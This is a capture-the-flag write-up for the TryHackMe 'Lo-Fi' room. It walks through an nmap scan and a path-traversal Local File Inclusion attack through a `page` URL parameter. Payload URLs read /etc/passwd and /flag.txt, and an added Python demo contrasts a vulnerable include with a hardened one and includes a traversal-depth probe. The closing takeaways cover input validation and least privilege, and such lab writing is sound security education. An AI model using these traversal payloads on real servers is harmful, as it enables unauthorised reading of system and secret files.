Lo-Fi TCTF
An nmap scan finds the target's HTTP service; a Local File Inclusion (LFI) vulnerability in a URL parameter is then used to read system files and retrieve the flag from the hidden flag.txt. The write-up closes by stressing input validation and access control as the defences against this class of bug. 2025-8-20 19:54:18 Author: infosecwriteups.com

Death Esther

Want to hear some lo-fi beats, to relax or study to? We’ve got you covered!

This walkthrough covers Task 1 of the TryHackMe room "Lo-Fi". The challenge is to exploit a Local File Inclusion (LFI) vulnerability in the room's web application and read a flag file hidden on the system.

To begin, perform an initial reconnaissance scan using nmap to identify open ports and running services:

nmap -sV -sC <ip>
death@esther:~$ nmap -sV -sC 10.10.63.207
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-03 22:43 IST
Nmap scan report for 10.10.63.207
Host is up (0.16s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Lo-Fi Music
|_http-server-header: Apache/2.2.22 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Two ports are open: SSH on 22, for which we have no credentials, and an Apache web server on 80. The HTTP service is the obvious place to start, so time to explore the website.


On the surface, the website was pretty basic. It had five Lo-Fi music tracks, each with a play button. Nothing seemed unusual until I clicked on a track and noticed something intriguing in the URL.

The site loaded each track through a `page` query parameter in the URL. A parameter whose value names the file to be served is a classic hint of a Local File Inclusion (LFI) vulnerability: if the application passes that value to a file include without checking it, it may accept any path at all.


At this point, my instincts kicked in. Could this be vulnerable to LFI? There was only one way to find out.

LFI arises when a web application builds a file path from user input and then includes or reads that file. By prefixing the value with path-traversal sequences (../), an attacker can step out of the intended directory and read files elsewhere on the server, limited only by what the web server's user account is allowed to open. To test for it, I requested /etc/passwd, the standard first probe in LFI exploitation: the file exists on every Linux host, is world-readable, and has an unmistakable format (lines beginning root:x:0:0:), so its appearance in the response settles the question.

http://10.10.63.207/?page=../../../../etc/passwd

And boom! It worked.


This confirmed that I could read any file the web server's user account had permission to open. Now it was time for the real prize: the hidden flag.

After several trial-and-error attempts at likely names and locations, I found the flag stored at the file-system root in a file named flag.txt. I had expected something like a "user" flag file in a home directory, but it was much simpler than I had imagined.

http://10.10.63.207/?page=../../../../flag.txt


Victory! The payload resolves to /flag.txt because any ../ beyond the root directory is simply ignored, so four levels of traversal are enough from anywhere under /var/www. The flag was mine, and the challenge was successfully completed.

This exercise reinforced the importance of secure coding practices. Here are some key takeaways:

  1. Always validate user input. Never pass an external parameter to a file include or file read without checking it; ../ sequences, absolute paths and encoded variants of both must be rejected.
  2. Use an allowlist instead of a blocklist. Map the parameter to a fixed set of known page or track names and look the file up from that table, rather than trying to filter out bad characters, and resolve the final path and confirm it still lies inside the intended directory as a second layer.
  3. Apply least privilege. /etc/passwd is world-readable by design, so reading it shows the include is unconstrained rather than a permissions failure; the real defence is to run the web server as a low-privilege account, keep secrets out of files that account can read, and confine the application to its own content directory.
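The following is an added example, not code from the original write-up or from the Lo-Fi room itself. It models the `?page=` include described above in two forms, the vulnerable version that the traversal payloads exploit and a hardened version that applies the allowlist and containment check from the takeaways, and runs the same trial-and-error depth probe against both. The fake file system, the `tracks/` directory and every function name are constructed for the demo; only the `page` parameter, the `../` payloads and the two target files come from the write-up.

```python
"""
Added example, not code from the original write-up: a stand-in for the Lo-Fi
site's `?page=` include, once with the bug and once hardened, plus the probe
a tester would run to find a working traversal depth. The fake file system,
the tracks/ directory and all function names are constructed for this demo.
"""
import posixpath
from typing import Callable, Optional

# Constructed stand-in for the target's file system (docroot at /var/www).
FAKE_FS = {
    "/var/www/tracks/track1.mp4": "<binary: track1>",
    "/var/www/tracks/track2.mp4": "<binary: track2>",
    "/etc/passwd": (
        "root:x:0:0:root:/root:/bin/bash\n"
        "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
    ),
    "/flag.txt": "flag{constructed-example-flag}\n",
}
DOCROOT = "/var/www"
TRACK_DIR = DOCROOT + "/tracks"


def vulnerable_include(page: str) -> Optional[str]:
    """Emulates the bug: `page` is joined to the tracks directory and read
    with no checks, so ../ sequences walk out of it (think
    include($_GET['page'])). posixpath.normpath collapses '/../' at the root
    the same way the kernel does, so extra ../ past / are ignored."""
    path = posixpath.normpath(posixpath.join(TRACK_DIR, page))
    return FAKE_FS.get(path)


# Allowlist: the only values `page` may take, mapped to real file names.
ALLOWED_PAGES = {"track1": "track1.mp4", "track2": "track2.mp4"}


def hardened_include(page: str) -> Optional[str]:
    """Allowlist first; then a containment check on the resolved path as a
    second layer, so a future edit to the table cannot reintroduce traversal."""
    filename = ALLOWED_PAGES.get(page)
    if filename is None:
        return None
    path = posixpath.normpath(posixpath.join(TRACK_DIR, filename))
    if posixpath.commonpath([path, TRACK_DIR]) != TRACK_DIR:
        return None
    return FAKE_FS.get(path)


PASSWD_MARKER = "root:x:0:0:"


def find_traversal_depth(fetch: Callable[[str], Optional[str]],
                         max_depth: int = 8) -> Optional[int]:
    """Send ../ prefixes of increasing depth (the trial-and-error step of the
    write-up) and return the first depth whose response looks like
    /etc/passwd. `fetch` stands in for an HTTP GET of ?page=<payload>."""
    for depth in range(1, max_depth + 1):
        body = fetch("../" * depth + "etc/passwd")
        if body is not None and PASSWD_MARKER in body:
            return depth
    return None


def read_via_lfi(fetch: Callable[[str], Optional[str]], depth: int,
                 target: str) -> Optional[str]:
    """Reuse a working depth to read another file, e.g. '/flag.txt'."""
    return fetch("../" * depth + target.lstrip("/"))


if __name__ == "__main__":
    depth = find_traversal_depth(vulnerable_include)
    print("vulnerable: traversal depth", depth)
    print(read_via_lfi(vulnerable_include, depth, "/flag.txt"))
    print("hardened: traversal depth", find_traversal_depth(hardened_include))
```

Against the vulnerable version the probe succeeds at depth 3 (tracks/ sits three levels below /) and the same depth then reads /flag.txt; the write-up's four-level payload works too because the extra ../ is discarded at the root. Against the hardened version no depth succeeds, and even a literal `/etc/passwd` is refused because it is not a key in the allowlist. `posixpath` is used instead of `os.path` so the behaviour is the same on any host running the example.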

Source: https://infosecwriteups.com/lo-fi-tctf-e3e4ab6a9200?source=rss----7b722bfd1b8d---4